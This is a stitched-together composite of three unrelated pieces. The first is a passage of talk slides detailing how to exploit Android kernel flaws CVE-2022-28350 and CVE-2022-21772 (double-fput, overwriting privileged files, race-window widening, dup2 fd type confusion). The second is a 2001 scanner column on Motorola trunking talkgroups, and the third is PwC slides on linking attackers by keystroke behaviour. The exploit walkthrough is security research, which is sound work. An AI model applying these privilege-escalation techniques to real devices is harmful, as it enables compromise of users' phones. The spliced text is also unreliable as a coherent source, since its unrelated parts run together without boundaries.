The answer is:
The DAC is only checked in open(). There are no
DAC checks in read() and write()
…
…
58
Exploit of CVE-2022-28350
On Android, the unprivileged process cannot read/write the "stolen" privileged file because of SELinux
int rw_verify_area(int read_write, struct file *file, const loff_t *ppos,
size_t count)
{
…
return security_file_permission(file,
read_write == READ ? MAY_READ : MAY_WRITE);
}
read(fd, buf, buf_len);
write(fd, buf, buf_len);
The exploitation method of "stealing" a privileged file from others has been mentioned by Mathias Krause here, but this won't work on Android.
59
Exploit of CVE-2022-28350
Let’s find some other way out!
What if the released file object gets
reused in the same process?
Unprivileged Process A
file object1
fd_array
[0]
[1]
[fd]
file object0
file object_x
[fd2]
Two different fds are associated with a
same file object! But the refcount of the
file object is still 1
…
…
60
Exploit of CVE-2022-28350
What happens if we close both fd and fd2?
close(fd);
close(fd2);
int filp_close(struct file *filp, fl_owner_t id)
{
int retval = 0;
…
fput(filp);
return retval;
}
A double-fput() vulnerability
has been constructed!!!
61
Exploit of CVE-2022-28350
What can we do with a double-fput() vulnerability?
Jann Horn from Google Project Zero has given an answer to this question here: he showed how to write a privileged file from an unprivileged process with a double-fput() vulnerability!
Maybe I can use the
similar strategy to
exploit the CVE-2022-
28350?
62
My exploit for CVE-2022-28350
Step1: Construct the scene with CVE-2022-28350
fd
file object
fd2
An unprivileged file, for
example:/sdcard/data/test.txt
Untrusted
app
63
Step2: try to write the privileged file in a race condition
Thread A
Thread B
write(fd, evil_content, len);
ssize_t vfs_write(struct file *file, const char __user *buf, size_t
count,…)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos, count);
…
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
…
return ret;
}
close(fd);close(fd2);
open(privileged_file_path, O_RDONLY);
file object
The privileged file
write mode check
SELinux check
Succeed in writing the privileged file!
reuse the file object
release the file object
My exploit for CVE-2022-28350
64
Thread A
Thread B
write(fd, evil_content, len);
ssize_t vfs_write(struct file *file, const char __user *buf, size_t
count,…)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos, count);
…
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
…
return ret;
}
close(fd);close(fd2);
open(privileged_file_path, O_RDONLY);
write mode check
SELinux check
reuse the file object
release the file object
The tiny race window is still a challenge:
race window
Succeed in writing the privileged file!
file object
The privileged file
My exploit for CVE-2022-28350
65
Try to widen the race window with the method given by Jann Horn:
Thread A
Thread B
Thread C
read(<pipe>)
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos,
count);
ret = file->f_op->write(file, buf, count, pos);
write mode check
SELinux check
close(fd);close(fd2);
open(privileged_file_path, O_RDONLY);
write(<pipe>)
[pinned to CPU 1]
[idle priority]
[pinned to CPU 1]
[normal priority]
[pinned to CPU 2]
[normal priority]
Succeed in writing the privileged file!
My exploit for CVE-2022-28350
66
The exploit will succeed with a high probability:
Tested on an affected Android 12 device
Attack from an untrusted app
My exploit for CVE-2022-28350
67
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
68
UAF caused by race condition in fd export operation
static long dev_ioctl(struct file *filp, unsigned int cmd, unsigned long
arg)
{
switch(cmd) {
case UAF_TEST:
{
int fd;
struct file *f;
void *cxt = kzalloc(128, GFP_KERNEL);
…
fd = get_unused_fd_flags(O_RDWR);
…
f = anon_inode_getfile("DEMO", &demo_fops, cxt,
O_RDWR);
…
fd_install(fd, f);
*(unsigned long *)(f->private_data) = 0xdeadbeef;
return put_user(fd, (int __user *)arg);
}
…
static int demo_release(struct inode *nodp, struct file *filp)
{
kfree(filp->private_data);
return 0;
}
static const struct file_operations demo_fops = {
.owner = THIS_MODULE,
.open = demo_open,
.release = demo_release
};
A typical issue with a tiny race window:
Very tiny race
windows!!!
69
Try to trigger the UAF:
User Space
Kernel space
file
Thread A
fd_install(fd, f);
*(unsigned long *)(f->private_data) =
0xdeadbeef;
Thread B
close(fd);
UAF
It is really hard to hit the race because of the tiny race window
tiny race window
UAF caused by race condition in fd export operation
70
If we want to exploit the issue:

Thread A (kernel space, via the ioctl):
    fd_install(fd, f);
    *(unsigned long *)(f->private_data) = 0xdeadbeef;    <- the evil write

Thread B (user space), inside the tiny race window:
    close(fd);              -> release the file object
    open many files         -> heap spray, to try to reuse the released file object

We can barely hit the race because these operations are too slow for the tiny race window.

UAF caused by race condition in fd export operation
71
Try to widen the race window with the method given by Jann Horn:

Thread A [pinned to CPU 1] [idle priority]:
    fd_install(fd, f);
    *(unsigned long *)(f->private_data) = 0xdeadbeef;

Thread B [pinned to CPU 1] [normal priority] - woken inside the race window:
    read(<pipe>)
    close(fd);
    open many files to try to reuse the released file object

Thread C [pinned to CPU 2] [normal priority]:
    write(<pipe>)

Evil write succeeds!
UAF caused by race condition in fd export operation
72
We have a big chance to hit the race and turn the issue into a memory corruption:
the released file is reused as a binder file, so f->private_data now points to a
binder_proc, and the delayed write

    *(unsigned long *)(f->private_data) = 0xdeadbeef;

plants 0xdeadbeef inside the binder_proc.

UAF caused by race condition in fd export operation
73
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
74
Fd type confusion caused by race condition in fd import operation
CVE-2022-21772
TEEC_Result TEEC_RegisterSharedMemory(struct TEEC_Context *ctx,
struct TEEC_SharedMemory *shm)
{
int fd;
size_t s;
struct dma_buf *dma_buf;
struct tee_shm *tee_shm;
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
…
tee_shm = dma_buf->priv;
…
shm->shadow_buffer = tee_shm->kaddr;
…
return TEEC_SUCCESS;
}
Annotations on the code above: teec_shm_alloc() creates a specific dma-buf fd; dma_buf_get(fd) imports the fd to get the dma_buf (the file's private_data points to the dma_buf, and dma_buf->priv points to the tee_shm); "dma_buf->priv" is then referenced as a tee_shm.
75
Thread A:
    create a specific dma-buf fd:         fd = teec_shm_alloc(ctx->fd, s, &shm->id);
    import the dma-buf fd to get dma_buf: dma_buf = dma_buf_get(fd);
    reference the "dma_buf->priv":        tee_shm = dma_buf->priv;   <- fd type confusion happens!

Thread B, inside the race window (between creating and importing the fd), recreates the fd:
    close(fd);
    fd = create_a_diff_dma_buf_fd();

We can hardly hit the race because the operations are too slow for the race window.
Fd type confusion caused by race condition in fd import operation
76
The same race again (Thread A creates, imports, then references the dma-buf fd; Thread B recreates the fd inside the race window). We only want to finish the work:

    fd_array[fd] = another dma_buf file

Are there any other syscalls which can finish this work faster?
Fd type confusion caused by race condition in fd import operation
77
Syscall: dup2(int oldfd, int newfd)
static int do_dup2(struct files_struct *files,
		   struct file *file, unsigned fd, unsigned flags)
__releases(&files->file_lock)
{
	…
	rcu_assign_pointer(fdt->fd[fd], file);   /* fd_array[fd] = file */
	…
	if (tofree)
		filp_close(tofree, files);       /* release the old file */
	return fd;
	…
}
dup2() can finish the "fd_array[fd] = another dma_buf file" work much faster!
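A user-space sketch of why dup2() helps: it swaps what an fd number refers to in a single step, with no closed/unused gap. Two regular files stand in for the two dma-buf files; all paths and names here are illustrative:

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as d:
    path_a = os.path.join(d, "a")   # stands in for the original dma-buf
    path_b = os.path.join(d, "b")   # stands in for the attacker's dma-buf
    with open(path_a, "w") as f:
        f.write("old file")
    with open(path_b, "w") as f:
        f.write("new file")

    fd = os.open(path_a, os.O_RDONLY)        # the fd the victim will import
    new_fd = os.open(path_b, os.O_RDONLY)    # replacement, prepared in advance

    # One call: fd_array[fd] = new file, and the old file is released;
    # there is no intermediate state where fd is closed or unused.
    os.dup2(new_fd, fd)

    data = os.read(fd, 16)
    os.close(fd)
    os.close(new_fd)

print(data)  # b'new file'
```

Compare this with close(fd) followed by a fresh open(), which leaves a window where the fd slot is empty.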
Fd type confusion caused by race condition in fd import operation
78
Thread A:
    create a specific dma-buf fd:         fd = teec_shm_alloc(ctx->fd, s, &shm->id);
    import the dma-buf fd to get dma_buf: dma_buf = dma_buf_get(fd);
    reference the "dma_buf->priv":        tee_shm = dma_buf->priv;   <- fd type confusion happens!

Thread B, inside the race window, recreates the fd in a single step:
    int diff_dma_buf_fd = create_a_diff_dma_buf_fd();   /* prepared in advance */
    dup2(diff_dma_buf_fd, fd);
Fd type confusion caused by race condition in fd import operation
79
void ion_buffer_destroy(struct ion_buffer *buffer)
{
…
buffer->heap->ops->free(buffer);
vfree(buffer->pages);
kfree(buffer);
}
We have a big chance to hit the race and turn the issue into a memory corruption:
the substituted fd now refers to a different dma-buf file, whose private_data /
dma_buf->priv is an ion_buffer (with fields such as "struct ion_heap *heap")
rather than a tee_shm, so the type-confused accesses corrupt memory.
Fd type confusion caused by race condition in fd import operation
80
Thank you!
81
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
1 of 6
6/18/2007 14:11
This article first appeared in the April 2001 issue of Monitoring Times.
MOTOROLA TYPE II TRUNKING
With all of the various trunk-tracking scanners and software out there it is sometimes difficult to
make sense of talkgroup numbers and understand why they occasionally change during a
conversation. This month we'll take a look at Motorola Type II talkgroups and the different ways
they can be displayed. We'll also report on a new radio system being built by Motorola for the
state of Illinois.
Type II Talkgroups
Since your site seems to be becoming something of a collection point for tiny
bits of the trunked jigsaw, if you are interested, the codes showing up on my
780 for Palm Springs Police Department in California are:
32784 - main channel
32816 - secondary
32912 - surveillance
There are batches of other things ranging from the Airport to the dogcatcher
but I haven't logged them down. The reason I note the above numbers is
that they are distinctly different from those shown in the Uniden/Bearcat
booklet which are in the format 200-13, 400-04, etc.
Regards, David
David, congratulations on your purchase of a Uniden 780XLT scanner. Although the manual for
the scanner is pretty good, there is often confusion about the way a talkgroup may be displayed.
The City of Palm Springs, California, is listed as having a Motorola hybrid system, which means
it carries both Type I and Type II traffic. Apparently the Police Department uses Type II radios
and the other city services use Type I. Five frequencies are licensed to the city, namely
857.4875, 858.4875, 858.9625, 859.4875 and 860.7125 MHz.
Type I and Type II transmissions both use sixteen binary digits, or bits, to represent a talkgroup.
These bits are sent out with every repeater transmission and are interpreted by your scanner.
A Type I system divides up those 16 bits into blocks, fleets, subfleets, and users. Talkgroups in
Type I systems are usually displayed as FFF-SS, where FFF is a Fleet ID and SS is a subfleet
ID. The trick with Type I systems is determining exactly how a particular system divides up
those 16 bits. That information is represented by a fleet map, which I described in detail in the
August 2000 Tracking the Trunks column. Back issues of Monitoring Times are $4.50 from
Grove Enterprises 800-438-8155 and previous Tracking the Trunks columns are on my website
at www.signalharbor.com.
Status Bits
A Type II system divides the 16 bits differently than a Type I system. The 16 bits in a Type II
system are split into 12 bits of talkgroup identifier and 4 status bits. The status bits identify
special situations and are usually all zeroes.
Right-most
Status Bits   Decimal   Meaning
000           0         Normal transmission
001           1         Fleet-wide (A talkgroup for all radios)
010           2         Emergency
011           3         Crosspatch between talkgroups
100           4         Emergency crosspatch
101           5         Emergency multi-select
110           6         Unknown
111           7         Multi-select (initiated by the dispatcher)
The three right-most status bits indicate if the message is an emergency and whether the
talkgroup is interconnected in some way. The left-most status bit indicates whether or not the
transmission is encrypted using the Data Encryption Standard (DES). A zero bit means the
message is not encrypted and a one bit means it is encrypted. For example, a normal message has
status bits of 0000 (0 in decimal). If that transmission was encrypted, it would have status bits
of 1000 (8 in decimal). An emergency message that is not encrypted has status bits of 0010 (2
in decimal), while an encrypted emergency message would have status bits of 1010 (10 in
decimal). Note that an encrypted message implies that it is in digital format and that it will come
out of your scanner as a harsh buzzing sound instead of the radio user's voice.
The complete set of sixteen bits that make up a talkgroup can be displayed a number of ways.
They can be shown as a decimal number, like 32784 or 59216. They may also appear as
hexadecimal numbers, such as 801 or E75.
The conversion between decimal and hexadecimal is straightforward. The easiest way is to use a
scientific calculator, and it just so happens that one comes with Microsoft Windows.
In Windows, Press the Start button, select Programs and then Accessories. Click on the
Calculator selection to start the Windows calculator program. Once the calculator program
is running, you'll need to switch from Standard to Scientific mode, which you can do by clicking
on "View" in the menu bar and choosing "Scientific".
The scientific calculator has quite a few buttons, but we're only interested in the selections in the
upper left-hand side just below the display. The program starts out with "Dec" (decimal) option
selected, meaning the display will show numbers in the usual decimal format.
In David's example, the main channel has a decimal talkgroup of 32784. So, in the calculator we
enter 32784 and then select the "Hex" (hexadecimal) option. The display changes to show
8010. Each hexadecimal digit represents four bits of the talkgroup number, with the last digit
representing the status bits. Because the last four bits are zero for a normal talkgroup, many
listings drop the last digit of the hexadecimal number. In David's example the talkgroup would
be represented in hex as 801.
We can also view the same number in binary by choosing the "Bin" option. 32784 is equivalent
to 1000 0000 0001 0000. These are the sixteen bits that make up the Type II talkgroup.
The last four bits are all zero, meaning the status bits are indicating this ID is a normal talkgroup.
In fact, the status bits in each of the three talkgroups David mentions are all zero:
Decimal   Hexadecimal   Binary
32784     8010          1000 0000 0001 0000
32816     8030          1000 0000 0011 0000
32912     8090          1000 0000 1001 0000
Interesting things happen when the status bits are something other than zero. If, for example, the
Palm Springs surveillance talkgroup of 32912 had an emergency message, the status bits would
change from 0000 to 0010, so the sixteen bits of the talkgroup then become 1000 0000
1001 0010. If we put this binary number into the calculator and convert it to decimal, we find
the new decimal number to be 32914.
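For readers who like to script the arithmetic, the status-bit manipulation looks like this (a short Python sketch; the function name is mine):

```python
# A Type II talkgroup is 12 bits of ID plus 4 status bits (the low nibble).

def with_status(talkgroup, status):
    # Replace the four status bits of a Type II talkgroup.
    return (talkgroup & ~0xF) | status

print(hex(32784))                  # 0x8010, usually listed as hex 801
print(with_status(32912, 0b0010))  # emergency status on 32912 gives 32914
```

The same masking recovers the base talkgroup from an observed ID: 32914 & ~0xF gives back 32912.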
Some scanners may be preset to ignore status bits in a Motorola system and always report the
same talkgroup no matter what happens. This feature may have to be disabled in order to figure
out Type I fleet maps, but is handy for following Type II conversations.
Other scanners will always display the full talkgroup number, which may change during a
conversation depending on the status bits. This can cause the scanner to miss conversations if
each of the possible talkgroups are not programmed into the scan list.
To sum up for David, the numbers he's reporting are valid Type II talkgroups from the Palm
Springs Police Department. The other numbers in the format FFF-SS are talkgroups from the
other Type I radios that share the hybrid system.
Illinois Starcom 21
Dan,
I read your pages in Monitoring Times January 2001 and decided to drop
you a line. I got this information from a local newspaper just last week.
Illinois Governor Ryan announced a $25 million grant for a new radio system
phased in over the next 3 years. The state will lease time on the new
Starcom 21 network from Motorola. It will be made available to other federal,
state, and local public safety agencies if they want to update their own
outmoded systems.
Reading between the lines, I would say the state police are going to phase
out their low band radio system statewide. Also I would assume the Illinois
Department of Transportation 47 MHz system will follow also. The VHF 155
MHz state police frequency will have to stay in place for use with other police
departments (ISPERN, IREACH etc.) As we already know the state police
districts in the Chicago area are already using 800 MHz.
I don't know anything about Starcom 21 - is there a scanner yet that will work
with this system? Or is this digital? Maybe a competitive brand two-way radio
down the road, properly programmed, will be around. At the rate everyone is
going, no one will be left on low band. I've always said give 29.7 - 54 MHz to
us hams (we like skip conditions) and trade part of the 440 MHz and also 1.2
GHz for commercial use (they don't like skip).
Daryl
Thanks for the information, Daryl. Funding for the Starcom 21 network comes out of the
Venture TECH fund from the Illinois Technology Office. This fund promises to provide research
and development dollars for a number of law enforcement initiatives, including expansion of the
Illinois State Police Wireless Information Network, wireless access to photographic images and
fingerprints, more rapid access to wants and warrants databases, and an automated voice
dispatch system. The new Starcom 21 network is one of those initiatives.
Motorola, headquartered in the Chicago suburb of Schaumburg, was selected to build Starcom
21 after a competitive bid process. The Illinois State Police will purchase new radios and lease
airtime on the network, as will other federal, state, and local public safety agencies. Rather than
spending a lot of money to establish their own independent systems, county and local agencies
will have the option of joining the state network.
The plan is to phase in the network over three years, starting with coverage in the southern part
of the state and moving northward. The state hopes that by having one common radio system,
problems of interoperability -- the ability of agencies to communicate directly with each other --
will be a thing of the past.
As Daryl noted, the Chicago District of the Illinois State Police is currently using a trunked radio
system. It's actually two EDACS networks, one covering a northern patrol area and the other a
southern patrol. Frequencies in LCN (Logical Channel Number) order are:
North: 866.8875, 866.4625, 867.3875, 866.9625, 867.4625, 867.8875, 868.3875, 868.4625,
868.8875 and 868.9625 MHz.
South: 866.4125, 866.4375, 866.9375, 867.4125, 867.9375, 867.9125, 868.4375, 868.4125,
868.9375 and 868.9125 MHz.
Unfortunately, I don't have any technical details about the Starcom 21 system. I expect that it
will be a trunked digital system, but I don't know if it will be compatible with other Motorola
products or with the APCO 25 standards, or something all together new. If readers have any
further information about the system, please send it along!
NPSPAC
Starcom 21 will almost certainly have the capability of operating on the National Public Safety
Planning Advisory Committee (NPSPAC) 800 MHz frequencies. The NPSPAC was formed
more than ten years ago to provide guidance in the use and coordination of public safety radio
frequencies, and their recommendations included the establishment of common inter-agency
frequencies.
Five channels in the 800 MHz band are set aside for mutual aid across the country. One
frequency, 866.0125 MHz, is designated a calling channel. The other four, at 866.5125,
867.0125, 867.5125 and 868.0125 MHz, are tactical channels. Each of these channels is 25 kHz
wide and operates conventionally (that is, not trunked) with a tone coded squelch frequency of
156.7 Hz.
So, as you're scanning the 800 MHz band, be sure to include these five non-trunked frequencies
in one of your scan banks.
That's all for this month. More information is available on my website at www.signalharbor.com,
and I welcome your e-mail at [email protected]. Until next month, happy monitoring!
Comments to Dan Veeneman
Betrayed by the keyboard
How what you type can give you away
Matt Wixey
Research Lead, PwC UK Cyber Security
www.pwc.com
Building a secure
digital society.
PwC │ 2
Disclaimer
•
This content is presented for educational purposes only
•
What this presentation isn’t…
PwC │ 3
Introduction
Matt Wixey
• Research Lead for the Cyber Security BU
• Work on the Ethical Hacking team
• PhD student at UCL
• Previously worked in LEA doing technical R&D
PwC │ 4
Why this talk?
• Based on some research I did at UCL
• Interest in side-channel attacks
• Humans have side-channels too
• Previous work on forensic linguistics
• First degree = English Literature and Language
PwC │ 5
Agenda
• What is attribution?
• Problems
• Case Linkage Analysis
• Experimentation
• Results
• Implications
• Summary
PwC │ 6
What is attribution?
• Why would we want to do it?
• Benefits
• Types
• Approaches
PwC │ 7
What is attribution?
• Identifying an attacker’s location?
• Hunker et al, 2008; Wheeler and Larsen, 2003
• Identify the country or organisation behind an attack?
• Rid and Buchanan, 2014
• “Determining who is responsible for a hostile cyber act”?
• Mejia, 2014
• “We must find a person, not a machine”
• Clark and Landau, 2011
PwC │ 8
Benefits of attribution
• Deterring future attacks
• Improving defences
• Interrupting and disrupting attacks (Hunker et al, 2008)
• Does attribution actually lead to deterrence? (Guitton, 2012)
• Regardless, attribution is a desirable outcome (depending on
which side you’re on!)
PwC │ 9
Types of attribution
• Hutchins et al, 2011:
Atomic
Computed
Behavioural
PwC │ 10
Problems with attribution
• Hiding atomic IOCs
• Issues with computed IOCs
• Lack of tangible benefits from
behavioural IOCs
PwC │ 11
Hiding atomic IOCs
• These are the most effective identifiers
• Easy to resolve (usually)
• But also easiest to spoof/anonymise/obfuscate
PwC │ 12
Issues with computed IOCs
• Changes to malware make it harder
• Other methods:
• Correlating activity with office hours in timezones (Rid & Buchanan,
2014; CloudHopper, 2017)
• Deanonymising developers through artefacts (Caliskan et al, 2015)
• Similar malware capabilities (Moran & Bennett, 2013; Symantec, 2011)
• Distinguishing humans vs bots (Filippoupolitis et al, 2014)
PwC │ 13
Mo methods, mo problems
• Less focused on individuals
• Sufficient if aim is to identify a state/sponsor
• Challenge is then legal/procedural
PwC │ 14
Behavioural profiling
• Less attribution
• More trying to understand who hacks, and why
• Motivation, skills, attack behaviours (Landreth, 1985)
• Attitudes and culture (Chiesa et al, 2008; Watters et al, 2012)
• Psychological (Shaw et al, 1998)
PwC │ 15
Attack profiling
• Humans vs bots
• Filippoupolitis et al, 2014: Skill, education, typing speed, mistakes, etc
• Skill level
• Salles-Loustau et al, 2011: SSH honeypot. Stealth, enumeration, malware
familiarity, protection of target
• Attacker behaviour
• Ramsbrock et al, 2007: Specific actions undertaken
PwC │ 16
The problem
• Profiling attackers is interesting
• Next logical step is comparison
• To what extent is an attacker’s profile similar to another’s?
• Not really explored
PwC │ 17
• The idea
• Discovering case linkage analysis
• Benefits of linking offences
• What case linkage analysis is (and isn’t)
• Methodology
• Example
• Exceptions
Case Linkage Analysis
PwC │ 18
The idea
• I had an idea (rare occurrence - to be celebrated)
• Lurking in OSCP labs a few years ago
• Discussing attack techniques, commands, methodologies
• Casual observation 1: everyone has their own way of doing things
• Casual observation 2: this way of doing things rarely changes
PwC │ 19
Science!
• This seems obvious
• My first degree was English Lit
• Could pretty much make it up as you went along
• Apparently, in science, you have to prove stuff
• Can’t just write “this seems obvious”
• Science is hard
PwC │ 20
Discovering case linkage analysis
• How could I empirically test this?
• Came across “Case Linkage Analysis”
• Methodology used in crime science literature
• Designed to link separate crimes to common offenders
• Based on behavioural aspects (Woodhams & Grant, 2006)
PwC │ 21
Benefits of linking offences
• Can attribute previously unsolved crimes
• Can investigate offences under one grouping – focused resources
• Useful evidentially
• Database of offences grows = better chance of success
• A minority of offenders commit the majority of crimes (?)
• Not necessarily true of crime generally
• But more accurate with specialist crimes
PwC │ 22
Benefits of linking offences
• Best method for linking: physical evidence (DNA, fingerprints, etc)
• Highly accurate, but:
• May be absent or inconclusive (Grubin et al, 1997)
• Does not really apply to cyber attacks
• Closest approximation is forensic artefacts, but these are not always unique
• Time-consuming and expensive (Craik and Patrick, 1994)
PwC │ 23
What case linkage analysis is
• Uses behavioural evidence
• Things the offender does during the commission of an offence
• Classify granular crime behaviours into domains
• Create linked and unlinked pairs of offences
• Compare with behaviours in other offences
• Determine degree of similarity
PwC │ 24
What case linkage analysis isn’t
• It’s not offender profiling
• Offender profiling makes inferences about the offender
• Based on assumption of consistency between criminal and
everyday behaviour (Canter, 2000)
• Based on this behaviour, I infer that the perpetrator is a balding but
charismatic researcher from the UK
PwC │ 25
What case linkage analysis isn’t
• CLA: statistical inferences about the similarity of 2 or
more offences, based on common behaviours
• Crime A, perpetrated by Matt “Charismatic But Balding”
Wixey, has several features in common with Crime B
• Therefore, Wixey may have also committed Crime B
PwC │ 26
Case linkage analysis in context
• Two key assumptions
• Behavioural consistency
• Offenders display similar offending behaviours across crimes
• Behavioural distinctiveness
• The way an offender commits crimes is characteristic of that offender
• And distinguishable from the style of other offenders (Canter, 1995)
PwC │ 27
Case linkage analysis in context
• Both assumptions must be present
• Otherwise CLA is unlikely to be useful
• e.g. homicide: dumping a body in a remote location is
consistent for many offenders
• But not distinctive
PwC │ 28
Case linkage analysis in context
• Individuals have stable, distinctive responses (Shoda et al, 1994)
• Cognitive-affective personality system (CAPS)
• Mischel & Shoda, 1995; Mischel, 1999
• System of goals, expectations, beliefs, plans, strategies, memories
• CAPS is consistent yet distinctive (Zayas et al, 2002)
PwC │ 29
Case linkage analysis in context
• Assumptions of stability/distinctiveness made in other fields
• Forensic linguistics
• Word and sentence length; slang; typos; errors; syntax; idiolect; article
frequency; syllable count; punctuation; hapax legomena; sentence length;
stylistics
• Language is socially acquired, continually – so may change
• Some biometrics
• Typing speed; typos; typing habits
PwC │ 30
Case linkage analysis – does it work?
• Consensus: yes, in most cases
• Observed variance significantly smaller in linked crimes
• Grubin et al, 1997; Mokros & Alison, 2002
• Significant evidence for cross-situational consistency
• Both criminal and non-criminal behaviours (Tonkin et al, 2008)
PwC │ 31
Methodology
• Separate behaviours into domains
• Calculate similarity coefficient
• Input into logistic regression model
• Determine optimal combination of domains
• Receiver Operating Characteristic (ROC) curves
PwC │ 32
Methodology
• Lots of stats stuff
• I hate stats. I am bad at stats.
• Will try and explain this with a worked example
• None of that “left as an exercise for the reader” nonsense
PwC │ 33
Example
• Two burglaries, A and B
• We want to find out if the same offender did both
• Define a dichotomous dependent variable
• This is a Y/N question, and we’re trying to ‘predict’ the answer
• And find out what variables contribute more
• “Are these two crimes linked?”
PwC │ 34
Example
• Take granular behaviours and put them into domains
• e.g. Entry behaviours = method of entry; tools used; time of day; etc
• Property behaviours = property taken; property damaged; and so on
• These are our independent variables
• Make these dichotomous by turning into yes/no questions
• e.g. Entry behaviours: “was a screwdriver used? Was a crowbar used?
Was a window open? Were the occupants home?” etc
PwC │ 35
Example
• Then apply a similarity coefficient
• Index of similarity
• Jaccard’s is coarse, but the measure of choice (Tonkin et al, 2008)
• x = count of behaviours present in both
• y = count of behaviours present in A but not in B
• z = inverse of y
PwC │ 36
Example
• 1 = perfect similarity
• 0 = perfect dissimilarity
• 1 coefficient per domain
• Ignores joint non-occurrences
• This is a concern when dealing with police data
• Something may have been present, but not recorded
• Less of a concern in this case
PwC │ 37
Example
• Each coefficient into direct logistic regression model
• Predictive analysis
• “To what extent does a given factor contribute to an outcome?”
• e.g. “to what extent does being a smoker contribute to the risk of having a
heart attack?”
• Or “does similarity in the entry behaviours domain predict whether or
not the two burglaries are linked?”
PwC │ 38
Example
• Logistic regression tells us:
• Whether a variable is positively or negatively correlated with the outcome
• How well a given variable fits with the data
• The amount of variance that a given variable explains
• A p-value (probability of seeing this result if the null hypothesis is true)
• Run for each domain
PwC │ 39
Example
• Then forward stepwise logistic regression
• Start with one domain
• Add a domain at each step
• If this contributes to the model’s predictive power, keep it
• Else discard it
• Determines optimal combination of domains
PwC │ 40
Example
• Regression results into ROC curves
• Graphical representation
• x (probability of false positive) against y (probability of true positive)
• More reliable measure of predictive accuracy
• Based on area under the curve (AUC)
PwC │ 41
Example
• Overcomes statistical issue of using pairs from same sample
(Tonkin et al, 2008)
• No reliance on arbitrary thresholds (Santtila et al, 2005)
• Measure of overall predictive accuracy (Swets, 1988)
PwC │ 42
Example
http://www.statisticshowto.com/wp-content/uploads/2016/08/ROC-curve.png
• Diagonal: no better than
chance
• The higher the AUC value, the
greater the predictive accuracy
• 0.5 – 0.7 = low
• 0.7 – 0.9 = good
• 0.9 – 1.0 = high
• Swets, 1988
PwC │ 43
Exceptions
• Some offences are less suitable, e.g. homicide
• Bateman & Salfati, 2007; Harbort & Mokros, 2001; Sorochinski & Salfati, 2010
• Some offenders show more distinctiveness than others
• Bouhana et al, 2016
• Some behaviours less consistent, e.g. property stolen in burglaries
• Bennell & Canter, 2002; Bennell & Jones, 2005
PwC │ 44
Exceptions
• MO is a learned behaviour, and offenders develop
• Pervin, 2002; Douglas & Munn, 1992
• Offenders will change behaviours in response to events
• Donald & Canter, 2002
• Behaviours under offender’s control more likely to be stable
• Furr & Funder, 2004; Hettema & Hol, 1998
• So offences involving victim interaction may differ
• e.g. whether victim fights back / runs / shouts for help, etc
PwC │ 45
Exceptions
• Most research only applied to solved crimes
• Woodhams & Labuschagne, 2012
• Relatively small samples
• Only serial offences
• Slater et al, 2015
PwC │ 46
Experimentation
• Concept
• Research design
• Hypothesis
• Analysis
• Results
PwC │ 47
Concept
• Could CLA be applied to network intrusions?
• Specifically, where attacker has code execution
• Has never been done before
• Take granular behaviours (keystrokes, commands, etc)
• Apply CLA methodology
PwC │ 48
Research design
• Common approach historically: use police reports
• Can be inaccurate and/or incomplete
• Victim accounts may be inaccurate
• Alison et al, 2001; Canter & Alison, 2003
• Crimes are often traumatic
• Traumatic experiences can distort memories
• Freyd, 1996; Halligan et al, 2003
PwC │ 49
Research design
• Crime reports unlikely to be granular enough
• Previous studies on attacker profiling used simulations
• Honeypot?
• Needed ground truth, as CLA previously untested on this offence type
• Same IP addresses do not guarantee same individual at keyboard
• Need to also distinguish between bots and humans
• Honeypots can be fingerprinted
• Attackers may deliberately change approach
PwC │ 50
Research design
• Modified open source Python SSH keylogger (strace)
• https://github.com/NetSPI/skl
• Two VMs, exposed on the internet (SSH)
• One account per user per box
• Deliberate privesc vulnerabilities
• Plus fake data to exfiltrate
PwC │ 51
Research design
• Obtained participants
• 10x pentesters / students / amateur enthusiasts
• Asked to SSH into both machines and try to:
• Get root
• Steal data
• Cover tracks
• Poke around
• Meanwhile, I recorded all keystrokes on each VM
PwC │ 52
Hypothesis
Cyber attackers will exhibit consistent and distinctive
behaviours whilst executing commands on compromised hosts,
which will provide a statistically significant basis for
distinguishing between linked and unlinked attack pairs.
PwC │ 53
Analysis
• Split into behavioural domains, 40 behaviours each:
  • Navigation – moving through filesystem
  • Enumeration
  • Exploitation – privesc and exfil attempts
• Also coded for 3 metadata variables:
  • Number of ms between each keystroke
  • Number of ms between each command
  • Number of backspaces (as percentage of all keystrokes)
PwC │ 54
Metadata variables
• Non-dichotomous
• Used in other CLA work, in addition to behavioural domains
• Intercrime distance (Bennell & Canter, 2002)
• Temporal proximity (Tonkin et al, 2008)
• Filippoupolitis et al, 2014: commands typed per second
• Problematic: length of command, time to complete, and time spent
interpreting or manipulating output
PwC │ 55
Example behaviours
PwC │ 56
Analysis
• Average attack time per host: 133.34 minutes
• Average commands per host: 243
• 2 participants got root on Host A
• 1 participant got root on Host B
PwC │ 57
Similarity coefficients
• 10 attackers, 2 machines = 100 crime pairs
• Compare each attack against Host A to each attack against Host B
• 10 linked pairs, 90 unlinked pairs
• Wrote application to calculate the similarity coefficient:
• For each pair for the 3 behavioural domains
• And differences between the 3 metadata variables
• Ended up with CSV file:
• ID, paired (y/n), coefficients for each domain, differences for each metadata
variable
PwC │ 58
Similarity coefficients - behaviours
PwC │ 59
Similarity coefficients - metadata
PwC │ 60
Logistic regression
• Imported CSV file into SPSS
• Strenuous Package for Sad Students
• Significant Probability of Statistics-related Stress
• Direct logistic regression for each predictor variable
• Then forward stepwise logistic regression
• Six models in total, for each domain
• Plus an optimal combination/order of all domains
PwC │ 61
Results
Here comes the slide you’ve all been waiting for…
PwC │ 62
Results
PwC │ 63
You’re too kind
(waits for applause to die down)
PwC │ 64
PwC │ 65
What does this tell us?
• Three behavioural domains can classify linked/unlinked offences
• High level of accuracy
